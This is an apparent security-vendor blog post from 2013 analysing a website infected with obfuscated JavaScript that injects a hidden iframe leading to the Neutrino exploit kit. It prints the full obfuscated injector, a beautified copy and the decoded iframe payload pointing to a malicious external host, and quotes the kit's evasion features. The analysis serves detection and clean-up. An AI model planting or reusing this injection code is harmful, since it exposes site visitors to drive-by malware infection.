Monday, May 13, 2013

Website infected with malicious iframe leading to Neutrino exploit


Malicious JavaScript injects hidden iframe leading to Neutrino exploit

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor.

Hidden malicious iframe redirects browser to URL hosting Neutrino exploit. This exploit kit is relatively new and targets at least two Java vulnerabilities CVE-2013-0431 and CVE-2012-1723. The snapshots of the advertising can be seen in malware don't need Coffee post.
Just some of the features this service offers:

1. Plugin's detector
2. On-going check vs major AV vendors to avoid detection of the main code parts
3. User friendly control panel allows Flow Control, Rotation managing, Exploit selection and e.t.c...
4. Transferring the .exe to the client in the encrypted form.

This particular infected website hosts suspicious JavaScript code injected in files and the breakdown of the detection is provided below.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Sun May 12 11:59:41 2013
Infected website's files: 2
Website malware scan report link: http://goo.gl/g8WyK



Quttera | Website Malware Scanner
Quttera | Website Security Scan report




Sitescan report | malicious JavaScript in 2 web pages



Threat dump: [[<script type='text/javascript' language='javascript' >
e=eval;
v="0"+"x";
a=0;
z="y";
try
{
a*=2
}
catch(q)
{
a=1
}
if(!a)
{
try
{
document["\x62od"+z]++
}
catch(q)
{
a2="_"
}
z="10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10_10_70_6d_79_68_74_6c_79_2f_30_42_14_10_10_84_27_6c_73_7a_6c_27_82_14_10_10_10_6b_76_6a_7c_74_6c_75_7b_35_7e_79_70_7b_6c_2f_29_43_70_6d_79_68_74_6c_27_7a_79_6a_44_2e_6f_7b_7b_77_41_36_36_79_7c_73_73_6c_79_7a_7b_7c_69_6c_7a_35_75_6c_7b_36_73_70_69_80_6b_70_71_6a_7d_71_6c_46_6d_6a_69_72_6f_74_6b_6c_7b_7e_7f_7c_44_3c_38_3f_3d_3e_3c_38_2e_27_7e_70_6b_7b_6f_44_2e_38_37_37_2e_27_6f_6c_70_6e_6f_7b_44_2e_38_37_37_2e_27_7a_7b_80_73_6c_44_2e_7e_70_6b_7b_6f_41_38_37_37_77_7f_42_6f_6c_70_6e_6f_7b_41_38_37_37_77_7f_42_77_76_7a_70_7b_70_76_75_41_68_69_7a_76_73_7c_7b_6c_42_73_6c_6d_7b_41_34_38_37_37_37_37_77_7f_42_7b_76_77_41_37_42_2e_45_43_36_70_6d_79_68_74_6c_45_29_30_42_14_10_10_84_14_10_10_6d_7c_75_6a_7b_70_76_75_27_70_6d_79_68_74_6c_79_2f_30_82_14_10_10_10_7d_68_79_27_6d_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_7a_79_6a_2e_33_2e_6f_7b_7b_77_41_36_36_79_7c_73_73_6c_79_7a_7b_7c_69_6c_7a_35_75_6c_7b_36_73_70_69_80_6b_70_71_6a_7d_71_6c_46_6d_6a_69_72_6f_74_6b_6c_7b_7e_7f_7c_44_3c_38_3f_3d_3e_3c_38_2e_30_42_6d_35_7a_7b_80_73_6c_35_73_6c_6d_7b_44_2e_34_38_37_37_37_37_77_7f_2e_42_6d_35_7a_7b_80_73_6c_35_7b_76_77_44_2e_37_2e_42_6d_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_44_2e_68_69_7a_76_73_7c_7b_6c_2e_42_6d_35_7a_7b_80_73_6c_35_7b_76_77_44_2e_37_2e_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_7e_70_6b_7b_6f_2e_33_2e_38_37_37_2e_30_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_6f_6c_70_6e_6f_7b_2e_33_2e_38_37_37_2e_30_42_14_10_10_10_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_6d_30_42_14_10_10_84"["split"](a2);
za="";
for(i=0;
i<z.length;
i++)
{
za+=String["fromCharCode"](e(v+(z[i]))-4-3);
}
zaz=za;
e(zaz);
}

 </script>]]



Malware entry


Malware entry details.

Beautified script



  1. = eval;
  2. = "0" + "x";
  3. = 0;
  4. = "y";
  5. try {
  6.     a *= 2
  7. } catch (q) {
  8.     a = 1
  9. }
  10. if (!a) {
  11.     try {
  12.         document["\x62od" + z]++
  13.     } catch (q) {
  14.         a2 = "_"
  15.     }
  16.     z ="10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10_10_70_6d_79_68_74_6c_79_2f_30_42_14_10_10_84_27_6c_73_7a_6c_27_82_14_10_10_10_6b_76_6a_7c_74_6c_75_7b_35_7e_79_70_7b_6c_2f_29_43_70_6d_79_68_74_6c_27_7a_79_6a_44_2e_6f_7b_7b_77_41_36_36_79_7c_73_73_6c_79_7a_7b_7c_69_6c_7a_35_75_6c_7b_36_73_70_69_80_6b_70_71_6a_7d_71_6c_46_6d_6a_69_72_6f_74_6b_6c_7b_7e_7f_7c_44_3c_38_3f_3d_3e_3c_38_2e_27_7e_70_6b_7b_6f_44_2e_38_37_37_2e_27_6f_6c_70_6e_6f_7b_44_2e_38_37_37_2e_27_7a_7b_80_73_6c_44_2e_7e_70_6b_7b_6f_41_38_37_37_77_7f_42_6f_6c_70_6e_6f_7b_41_38_37_37_77_7f_42_77_76_7a_70_7b_70_76_75_41_68_69_7a_76_73_7c_7b_6c_42_73_6c_6d_7b_41_34_38_37_37_37_37_77_7f_42_7b_76_77_41_37_42_2e_45_43_36_70_6d_79_68_74_6c_45_29_30_42_14_10_10_84_14_10_10_6d_7c_75_6a_7b_70_76_75_27_70_6d_79_68_74_6c_79_2f_30_82_14_10_10_10_7d_68_79_27_6d_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_7a_79_6a_2e_33_2e_6f_7b_7b_77_41_36_36_79_7c_73_73_6c_79_7a_7b_7c_69_6c_7a_35_75_6c_7b_36_73_70_69_80_6b_70_71_6a_7d_71_6c_46_6d_6a_69_72_6f_74_6b_6c_7b_7e_7f_7c_44_3c_38_3f_3d_3e_3c_38_2e_30_42_6d_35_7a_7b_80_73_6c_35_73_6c_6d_7b_44_2e_34_38_37_37_37_37_77_7f_2e_42_6d_35_7a_7b_80_73_6c_35_7b_76_77_44_2e_37_2e_42_6d_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_44_2e_68_69_7a_76_73_7c_7b_6c_2e_42_6d_35_7a_7b_80_73_6c_35_7b_76_77_44_2e_37_2e_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_7e_70_6b_7b_6f_2e_33_2e_38_37_37_2e_30_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_6f_6c_70_6e_6f_7b_2e_33_2e_38_37_37_2e_30_42_14_10_10_10_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_6d_30_42_14_10_10_84"["split"](a2);
  17.     za = "";
  18.     for (= 0; i < z.length; i++) {
  19.         za += String["fromCharCode"](e(+ (z[i])) - 4 - 3);
  20.     }
  21.     zaz = za;
  22.     e(zaz);



Malicious payload


Decoded payload injects hidden iframe to http://rullerstubes.net/libydijcvje?fcbkhmdetwxu=5186751 which leads to Neutrino exploit

  1. if (document.getElementsByTagName('body')[0]) {
  2.     iframer();
  3. } else {
  4.     document.write("<iframe src='http://rullerstubes.net/libydijcvje?fcbkhmdetwxu=5186751' width='100' height='100' style='width:100px;height:100px;position:absolute;left:-10000px;top:0;'></iframe>");
  5. }
  6. function iframer() {
  7.     var f = document.createElement('iframe');
  8.     f.setAttribute('src', 'http://rullerstubes.net/libydijcvje?fcbkhmdetwxu=5186751');
  9.     f.style.left = '-10000px';
  10.     f.style.top = '0';
  11.     f.style.position = 'absolute';
  12.     f.style.top = '0';
  13.     f.setAttribute('width', '100');
  14.     f.setAttribute('height', '100');
  15.     document.getElementsByTagName('body')[0].appendChild(f);
  16. }


Blacklisting status


The website is Suspicious on Google Safe Browsing.




Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.